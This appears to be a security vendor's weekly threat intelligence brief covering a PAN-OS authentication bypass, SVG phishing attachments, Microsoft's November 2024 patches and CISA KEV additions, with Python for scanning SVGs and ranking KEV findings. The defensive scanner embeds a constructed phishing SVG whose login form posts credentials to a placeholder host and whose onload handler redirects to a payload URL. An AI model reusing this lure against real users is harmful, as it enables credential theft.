Threat Intel Brief for November 11 - November 17, 2024

In this weekly Threat Intelligence Brief we look back at the week's top stories and security-related callouts to provide relevant, actionable insights for information security practitioners.

We reference threat intelligence gained through our position as a security provider as well as industry sources in the development of this brief.

In this edition:
PAN-OS Authentication Bypass Vulnerability CVE-2024-0012
SVG attachments used to evade phishing detections
Microsoft November 2024 Patch Tuesday
CISA KEV updates

PAN-OS Authentication Bypass Vulnerability: CVE-2024-0012

Palo Alto Networks has released a security advisory covering CVE-2024-0012, an authentication bypass in the PAN-OS management web interface. An unauthenticated attacker with network access to that interface could obtain administrator privileges, perform administrative actions, tamper with the configuration, or chain the bypass with authenticated privilege escalation vulnerabilities such as CVE-2024-9474.

Palo Alto Networks has scanned for vulnerable devices with an internet-facing management interface and lists the results on the customer support portal (https://support.paloaltonetworks.com). Once logged in, go to Products → Assets → All Assets → Remediation Required; devices tagged PAN-SA-2024-0015 were found to have an internet-facing management interface.

[Product status table from the Palo Alto Networks advisory; see the source link below for affected and fixed PAN-OS versions]

Patches have been released and should be applied as soon as possible. Palo Alto Networks' remediation guidance is to restrict management interface access to trusted internal IP addresses only, which greatly reduces exposure even before the patch is applied. Please follow the linked source article for full workaround and mitigation guidance. You can also check the Coretek Blog for a more detailed threat advisory.

Source: Palo Alto Networks

SVG attachments used to evade phishing detections

Threat actors are leveraging the versatility of SVG files, which can render vector graphics, embed HTML (via the <foreignObject> element), and execute JavaScript, to build phishing forms and distribute malware. Because an SVG is an XML text file rather than a binary, many security tools that key on executable or Office-document signatures do not flag these attachments, making them a growing concern for security analysts.

A recent example of this technique was an attached SVG file that displayed a fake Excel spreadsheet. The fake sheet contained a built-in login form that, when submitted, sent the entered credentials to the threat actors. It is important to note that legitimate SVG email attachments are uncommon, and end users should treat them as suspicious.
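As an added illustration (not code from the original brief or from the BleepingComputer report), the Python script below shows the check a mail gateway or an analyst can apply to an SVG attachment: parse it as XML and flag the features this lure depends on, namely <script> elements, <foreignObject> with embedded HTML form controls, event-handler attributes, javascript: URIs and external form targets. The two SVG samples, the .invalid hostnames and the element list are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the lure described above: the SVG draws a fake
# spreadsheet, embeds an HTML login form via <foreignObject>, carries inline
# script, a javascript: link and an event-handler attribute. The .invalid
# hostnames are placeholders, not real attacker infrastructure.
PHISHING_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xhtml="http://www.w3.org/1999/xhtml" width="600" height="400">
  <rect width="600" height="400" fill="#ffffff"/>
  <text x="20" y="30">Quarterly_Report.xlsx</text>
  <foreignObject x="0" y="50" width="600" height="300">
    <xhtml:form action="https://collector.invalid/submit" method="post">
      <xhtml:input name="email"/>
      <xhtml:input name="password" type="password"/>
      <xhtml:button type="submit">Open document</xhtml:button>
    </xhtml:form>
  </foreignObject>
  <script type="text/javascript">
    document.querySelector("form").addEventListener("submit", function () {});
  </script>
  <a href="javascript:void(0)"><circle cx="10" cy="10" r="5"/></a>
  <image href="x" onload="location='https://payload.invalid/'"/>
</svg>
"""

# Constructed benign image: a static vector drawing with no active content.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">
  <circle cx="8" cy="8" r="6" fill="#0057b8"/>
</svg>
"""

# Elements that carry script or HTML rather than vector geometry.
ACTIVE_ELEMENTS = {"script", "foreignobject", "form", "input", "iframe",
                   "embed", "object", "textarea", "button"}
EXTERNAL_URL = re.compile(r"^\s*(https?:)?//", re.IGNORECASE)


def local_name(qualified: str) -> str:
    """Strip an ElementTree '{namespace}name' prefix and lower-case the name."""
    return qualified.rsplit("}", 1)[-1].lower()


def scan_svg(data: bytes) -> list[str]:
    """Return a list of findings describing active content in an SVG document.

    An empty list means nothing suspicious was found. A parse failure is
    reported as a finding too: a gateway should not pass a file it could not
    inspect.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"parse-error: {exc}"]

    findings = []
    for elem in root.iter():
        name = local_name(elem.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"element:{name}")
        for attr, value in elem.attrib.items():
            aname = local_name(attr)
            if aname.startswith("on"):  # onload=, onclick=, onerror=, ...
                findings.append(f"event-handler:{aname}")
            elif aname == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript-uri:{name}")
            elif aname in ("href", "action") and EXTERNAL_URL.match(value):
                findings.append(f"external-url:{value.strip()}")
    return findings


def is_suspicious(data: bytes) -> bool:
    """Gateway verdict: quarantine any SVG that contains active content."""
    return bool(scan_svg(data))


if __name__ == "__main__":
    for label, sample in (("phishing", PHISHING_SVG), ("benign", BENIGN_SVG)):
        print(label, "->", "QUARANTINE" if is_suspicious(sample) else "allow")
        for finding in scan_svg(sample):
            print("   ", finding)
```

Run it over a real file with scan_svg(open(path, "rb").read()). The parser is strict XML, so a file that fails to parse is quarantined rather than waved through. Two caveats a gateway deployment needs beyond this snippet: SVGs delivered inside ZIP or HTML wrappers must be unpacked first, and an SVG shown through an <img> tag does not run script, whereas one opened directly from an attachment does, which is exactly the case this lure relies on.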

Source: BleepingComputer

Microsoft November 2024 Patch Tuesday

A total of 89 vulnerabilities were fixed, 4 of them rated critical. Affected products include Windows, Office, SQL Server, Azure, Dynamics, and products covered by Extended Security Updates (ESU).


2 actively exploited zero-day vulnerabilities were patched:

CVE-2024-43451: NTLM Hash Disclosure Spoofing Vulnerability - CVSS 6.5
CVE-2024-49039: Windows Task Scheduler Elevation of Privilege Vulnerability - CVSS 8.8

Official Microsoft release notes with links to all the individual CVEs can be found here: https://msrc.microsoft.com/update-guide/releaseNote/2024-Nov

Sources: Microsoft, Qualys

CISA KEV updates

CISA has added 7 new CVEs to their Known Exploited Vulnerability (KEV) catalog this week:

CVE-2021-26086 - Atlassian Jira Server and Data Center Path Traversal Vulnerability - CVSS 5.3
CVE-2014-2120 - Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability - CVSS 6.1
CVE-2021-41277 - Metabase GeoJSON API Local File Inclusion Vulnerability - CVSS 7.5
CVE-2024-43451 - Microsoft Windows NTLMv2 Hash Disclosure Spoofing Vulnerability - CVSS 7.5
CVE-2024-49039 - Microsoft Windows Task Scheduler Privilege Escalation Vulnerability - CVSS 8.8
CVE-2024-9465 - Palo Alto Networks Expedition SQL Injection Vulnerability - CVSS 9.2
CVE-2024-9463 - Palo Alto Networks Expedition OS Command Injection Vulnerability - CVSS 9.9


Don't know where to begin with vulnerability management?

Using CISA's KEV catalog as a risk-based filter is a great way to prioritize vulnerability remediation in your organization: a vulnerability with confirmed in-the-wild exploitation should be fixed before a higher-CVSS one that nobody is known to be exploiting. CISA publishes guidance on how to build the KEV catalog into a vulnerability management program (see the source link below).
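As an added, runnable example (not from CISA or from this brief), the Python below shows one way to apply the KEV catalog to a vulnerability scanner export: index the feed by CVE ID, then rank findings so that known-exploited entries come first regardless of CVSS, ordered by their catalog due date, with everything else ranked by CVSS afterwards. The KEV extract is constructed in the feed's real schema using CVE IDs from this week's list; its dateAdded and dueDate values are illustrative placeholders, and the scanner findings and the CVE-EXAMPLE-1 identifier are hypothetical.

```python
import json
from datetime import date

# Constructed extract in the shape of CISA's KEV JSON feed
# (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json).
# The CVE IDs and names are the ones listed in this brief; the dateAdded and
# dueDate values are illustrative placeholders, not the catalog's real dates.
KEV_JSON = """{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "vulnerabilities": [
    {"cveID": "CVE-2024-9463", "vendorProject": "Palo Alto Networks", "product": "Expedition",
     "vulnerabilityName": "Palo Alto Networks Expedition OS Command Injection Vulnerability",
     "dateAdded": "2024-11-14", "dueDate": "2024-12-05", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2024-9465", "vendorProject": "Palo Alto Networks", "product": "Expedition",
     "vulnerabilityName": "Palo Alto Networks Expedition SQL Injection Vulnerability",
     "dateAdded": "2024-11-14", "dueDate": "2024-12-05", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2024-43451", "vendorProject": "Microsoft", "product": "Windows",
     "vulnerabilityName": "Microsoft Windows NTLMv2 Hash Disclosure Spoofing Vulnerability",
     "dateAdded": "2024-11-12", "dueDate": "2024-12-03", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2024-49039", "vendorProject": "Microsoft", "product": "Windows",
     "vulnerabilityName": "Microsoft Windows Task Scheduler Privilege Escalation Vulnerability",
     "dateAdded": "2024-11-12", "dueDate": "2024-12-03", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2021-26086", "vendorProject": "Atlassian", "product": "Jira Server and Data Center",
     "vulnerabilityName": "Atlassian Jira Server and Data Center Path Traversal Vulnerability",
     "dateAdded": "2024-11-12", "dueDate": "2024-12-03", "knownRansomwareCampaignUse": "Unknown"}
  ]
}"""

# Constructed vulnerability-scanner export: (asset, CVE, CVSS base score).
# CVE-EXAMPLE-1 is a placeholder for a high-CVSS finding that is not in KEV.
SCAN_FINDINGS = [
    ("jira-01", "CVE-2021-26086", 5.3),
    ("expedition-01", "CVE-2024-9463", 9.9),
    ("ws-042", "CVE-2024-43451", 6.5),
    ("db-07", "CVE-EXAMPLE-1", 9.8),
]


def load_kev(kev_json: str) -> dict:
    """Index the KEV feed by CVE ID."""
    return {v["cveID"]: v for v in json.loads(kev_json)["vulnerabilities"]}


def sort_key(finding, kev: dict, today: date):
    """Lower tuples sort first: ransomware-linked KEV, other KEV by nearest
    due date, then non-KEV by CVSS."""
    _asset, cve, cvss = finding
    entry = kev.get(cve)
    if entry is None:
        return (2, 0, -cvss)  # tier 2: no known exploitation, CVSS only
    tier = 0 if entry.get("knownRansomwareCampaignUse") == "Known" else 1
    days_past_due = (today - date.fromisoformat(entry["dueDate"])).days
    return (tier, -days_past_due, -cvss)


def prioritize(findings, kev: dict, today: date) -> list:
    """Return (asset, cve, cvss, status) rows in remediation order."""
    ordered = sorted(findings, key=lambda f: sort_key(f, kev, today))
    return [(asset, cve, cvss, "KEV" if cve in kev else "not in KEV")
            for asset, cve, cvss in ordered]


def prioritized_assets(today_iso: str = "2024-11-20") -> list:
    """Run the ranking over the constructed sample data; returns asset names."""
    rows = prioritize(SCAN_FINDINGS, load_kev(KEV_JSON), date.fromisoformat(today_iso))
    return [asset for asset, _cve, _cvss, _status in rows]


if __name__ == "__main__":
    for row in prioritize(SCAN_FINDINGS, load_kev(KEV_JSON), date(2024, 11, 20)):
        print(row)
```

The point of the ordering is visible in the sample output: db-07, with the highest CVSS score of the four, lands last because its CVE is not known to be exploited, while the three KEV findings go first even at CVSS 5.3. In production, replace KEV_JSON with the live feed and SCAN_FINDINGS with your scanner's export; the dueDate field is the BOD 22-01 deadline for US federal civilian agencies, which other organizations commonly adopt as a service-level target.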

Source: Known Exploited Vulnerabilities Catalog | CISA

Coretek's managed SOC/SIEM customers benefit from the latest threat intelligence. If you're interested in learning more about what Coretek can offer your organization, please reach out: https://coretek.com/contact